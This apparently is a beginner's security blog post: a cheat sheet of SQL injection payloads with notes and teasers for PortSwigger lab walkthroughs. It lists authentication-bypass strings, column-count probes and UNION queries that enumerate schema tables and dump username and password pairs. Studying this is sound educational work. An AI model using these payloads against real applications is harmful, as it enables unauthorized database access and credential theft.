Some Basics of SQLi



Some of the common SQLi commands which are important to perform SQL injection attack:

General : 

               ' or '1' = '1

               ' or '1' = '1’

               ' or '1' = '1 -- -

               ' or '1' = '1 #

               1 UNION SELECT 1,2,3

For UNION Attack :

0 UNION SELECT 1,2,database()

0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'

0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'

0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users


In-Blind SQL :

               ' OR 1=1;--

               select * from users where username='' and password='' OR 1=1;

Bypass authentication :

SELECT a, b FROM table1 UNION SELECT c, d FROM table2

#determine the number of columns 

' ORDER BY 1--

' ORDER BY 2--

' ORDER BY 3--

' UNION SELECT NULL--

' UNION SELECT NULL,NULL--

' UNION SELECT NULL,NULL,NULL--

Union attacks :

' UNION SELECT username || '~' || password FROM users-- #|| - concat , ~ seperator

For Oracle Version

'+UNION+SELECT+NULL,username||'~'||password+FROM+users--


For a UNION query to work, two key requirements must be met:

  • The individual queries must return the same number of columns.
  • The data types in each column must be compatible between the individual queries.

To carry out a SQL injection UNION attack, you need to ensure that your attack meets these two requirements. This generally involves figuring out:

  • How many columns are being returned from the original query?
Which columns returned from the original query are of a suitable data type to hold the results from the injected query?

Happy Hacking H4ck3r😇

Comments

Post a Comment

Popular posts from this blog

My Starting 001

Image
When i started my journey, i was too much confused. I was waiting for a long time to get a proper guideline. Today i am sharing with you two the most impressive websites that you start you cyber security journey.   1. Try Hack Me (THM)   2. Hack The Box (HTB)  Hack The Box website Link Try Hack Me website Link THM or HTM , which one is best ?   Actually both are best for the beginners. If anyone likes to read blogs and comfortable with blogs , THM is best for him/her. THM comes with full concept of the topics then hands on with practical knowledge. On the other hand, HTM comes with practical hands on. You can hands dirty with practice and write-up as well.    My suggestion  I was starting with both. When i was getting bored with blogs or reading ,then i was going to the hack the box. My most of the rooms were practicing with try hack me . I like reading and comfortable with blogs. But hack the box pawn-boxes come with walk through, which is...
Read more

SQL injection attack, querying the database type and version on Oracle(Portswigger Lab 07)

Image
Path: Product Category filter Goal: display the database version string Step1: Determine the number of columns after the category name, we run a query Query: ‘ order by 1 - - then, select all and press Cntrl+U for URL encoding Response 200 OK It shows that the status HTTP/2 200 OK. It means the server responds to the malicious query. It also means that the server has 1 column. step 2: Then, we check the same query for the 2 columns. Query: ‘ order by 2 - -   then, select all and press Cntrl+U for URL encoding It shows that the status HTTP/2 200 OK. It means the server responds to the malicious query. It also means that the server has 2 columns. Step 3: Then, we check the same query for the 3 columns. Query: ‘ order by 3 - - select all and press Cntrl+U for URL encoding 'It shows that the status HTTP/2 500 Internal Server Error. It means the server doesn’t respond to the query. It also means that the server doesn’t have 3 columns. Step 4: Determine the datatype...
Read more

SQL Based on Portswigger Lab 3

This type of UNION attack is done using the UNION keyword, which lets you execute an additional SELECT query and append the results to the original query. For example , if an application executes the following query containing the user input "Gifts": SELECT name, description FROM products WHERE category = 'Gifts' Then an attacker can submit the input: ' UNION SELECT username, password FROM users-- Blind SQL : This means that the application does not return the results of the SQL query or the details of any database errors within its responses. First-order SQL injection:   It arises when the application takes user input in an unsafe way. Second-Order SQL injection:  It arises when the application takes user input from an HTTP request and stores it for future use. Later when handling a different HTTP request, the application retrieves the stored data and incorporates it into a SQL query in an unsafe way. Second-order SQL injection often arises in situation...
Read more